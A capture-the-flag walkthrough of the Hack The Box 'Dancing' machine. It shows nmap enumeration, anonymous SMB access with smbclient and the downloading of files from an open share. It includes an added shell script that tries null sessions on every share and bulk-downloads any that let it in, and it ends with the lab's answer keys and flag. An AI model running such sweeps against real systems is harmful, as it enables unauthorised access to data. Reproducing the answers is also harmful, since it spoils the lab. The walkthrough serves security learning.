Rohan A G

Hack the Box: DANCING

Machine difficulty: Very Easy

Setting up the environment

Refer to the blog post on the machine MEOW for how to configure and connect to the HTB VPN.

 

Cracking DANCING

STEP 1: Launch the machine

In order to use the machine, we must first spawn an instance of it, and the VPN connection has to be up before the machine can be spawned. If you're unsure where to begin, take a look at my Meow walkthrough, where I covered this in detail. Once you are connected and have spawned the machine, you will be given its IP address.

 

STEP 2: Check its status

We can use ping to check whether the machine answers our ICMP echo requests, which tells us we can reach it over the VPN. From the terminal, enter ping followed by the target's IP address, as shown in the image above.

 

 

STEP 3: Enumeration

When the target replies, we know we have network connectivity to it (a ping reply says nothing about the security of the connection, only that the host is reachable). We can now move on to the next stage: scanning the target for open ports and identifying the services listening on them. We use Nmap for this.

Nmap, the Network Mapper, sends probes to the target's ports and uses the responses to work out whether each port is open. Well-known ports are conventionally used by specific services, but a port number alone is not proof of what is running there, so we add the service detection flag -sV, which makes Nmap probe the open ports and report the service name and version it identifies.

 

Enter the nmap command as shown in the image above. We obtain three open ports and the services running on them: 135/TCP (msrpc, Microsoft Remote Procedure Call), 139/TCP (netbios-ssn, NetBIOS session service) and 445/TCP (microsoft-ds, SMB directly over TCP).

Next we list the shares the target exposes with smbclient -L followed by the target IP. Since we did not supply a username, smbclient defaults to our local Linux username and prompts for a password. We do not know any credentials for the target, so we try a guest or anonymous (null) session instead: either lets us log in without a valid username and password combination.

 

When asked for a password, we simply press Enter to submit an empty password. The listing succeeds and shows four shares, as seen in the image above.

·        ADMIN$ - A hidden administrative share that maps to the Windows directory, used by administrators for remote management of the host.

·        C$ - The administrative share for the C: disk volume, i.e. the whole drive.

·        IPC$ - The inter-process communication share, used for named pipes and RPC rather than files.

·        WorkShares - A custom, non-default share, which is the one worth investigating further.

 

 

STEP 4: Gaining access

Let's try to connect to each of these shares in turn with smbclient, giving the share path as //<target IP>/<share> and pressing Enter at the password prompt to see whether any of them accept an empty password. We start with ADMIN$.

As we can see, access is denied: we do not have valid credentials for this share. Let's try C$.

The same scenario again, with authentication failing for lack of valid credentials. Let's try WorkShares.



 

Success! We're in. The WorkShares share accepts the empty password, so it is readable without any valid credentials (anonymous access). The smb: \> prompt tells us we now have an interactive SMB session with the target.


The ls command can, as usual, be used to list the directories in the share:

To enter a directory, we use the cd command. Let's see what Amy.J has to offer. We discover worknotes.txt.

Using the get command, we download worknotes.txt to our own machine.

Going back up, let's change directory to James.P.

Listing the files there, we find flag.txt. We download it with get as well; the file lands in the local directory from which we launched smbclient.

We can now exit the SMB shell and print the flag with cat flag.txt.
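The whole enumeration-to-download sequence above can be scripted. The following is an added example for this walkthrough, not code from the original post: it parses the share table that smbclient -L prints, tries a null session (empty password, via smbclient -N) against every share, and recursively downloads any share that lets us in. The share listing embedded in SAMPLE_LISTING is constructed to look like the box's output so the parser can be run offline; the IP 10.129.1.12 is a placeholder, not the real machine address. It assumes the Samba smbclient and nmap are installed and the VPN is up.

```shell
#!/bin/sh
# SMB null-session share sweep (added example; not from the original post).
# Assumes: smbclient and nmap on PATH, HTB VPN connected, TARGET = machine IP.

# Constructed sample of `smbclient -L //TARGET -N` output (not captured from the box),
# embedded so list_shares/sweep can be exercised without a network.
SAMPLE_LISTING='
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available'

# list_shares TYPE: read a `smbclient -L` listing on stdin and print one share
# name per line. TYPE filters on the Type column ("Disk", "IPC", "Printer");
# an empty TYPE prints every share.
list_shares() {
    awk -v want="$1" '
        $1 == "Sharename" { in_table = 1; next }        # header row opens the table
        in_table && $1 ~ /^-+$/ { next }                 # underline row
        in_table && NF == 0 { in_table = 0; next }       # blank line closes the table
        in_table && $2 ~ /^(Disk|IPC|Printer)$/ && (want == "" || $2 == want) { print $1 }
    '
}

# null_session_ok TARGET SHARE: succeed (exit 0) if the share can be listed with
# no password. -N tells smbclient not to prompt, so this never blocks on input.
null_session_ok() {
    smbclient "//$1/$2" -N -c 'ls' >/dev/null 2>&1
}

# sweep TARGET: read a share listing on stdin and print every share that
# accepts a null session (ADMIN$ and C$ normally refuse; custom shares may not).
sweep() {
    target="$1"
    list_shares "" | while IFS= read -r share; do
        if null_session_ok "$target" "$share"; then
            printf '%s\n' "$share"
        fi
    done
}

# fetch_all TARGET SHARE: download the whole share into the current directory,
# the scripted equivalent of cd/ls/get by hand.
fetch_all() {
    smbclient "//$1/$2" -N -c 'recurse ON; prompt OFF; mget *'
}

if [ $# -ge 1 ]; then
    # Live run against a real target: confirm the SMB ports, then sweep and grab.
    TARGET="$1"
    nmap -sV -p 135,139,445 "$TARGET"
    smbclient -L "//$TARGET" -N | sweep "$TARGET" | while IFS= read -r share; do
        echo "[+] null session accepted on $share, downloading"
        fetch_all "$TARGET" "$share"
    done
else
    # No target given: show the parser over the constructed sample listing.
    printf '%s\n' "$SAMPLE_LISTING" | list_shares Disk
fi
```

Run it as ./smbsweep.sh <target IP> once the VPN is up; with no argument it only prints the Disk shares parsed from the embedded sample. On this box the sweep should report WorkShares alone and pull down Amy.J/worknotes.txt and James.P/flag.txt.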

Congratulations! Now that we have the answers, let's pwn the box.

 

ANSWER KEYS

  1. What does the 3-letter acronym SMB stand for? – Server Message Block

  2. What port does SMB use to operate at? – 445

  3. What network communication model does SMB use, architecturally speaking? – Client-Server Model

  4. What is the service name for port 445 that came up in our nmap scan? – microsoft-ds

  5. What is the tool we use to connect to SMB shares from our Linux distribution? – smbclient

  6. What is the flag or switch we can use with the SMB tool to list the contents of the share? – -L

  7. What is the name of the share we are able to access in the end? – WorkShares

  8. What is the command we can use within the SMB shell to download the files we find? – get

  9. Submit root flag – 5f61c10dffbc77a704d76016a22f1664

 
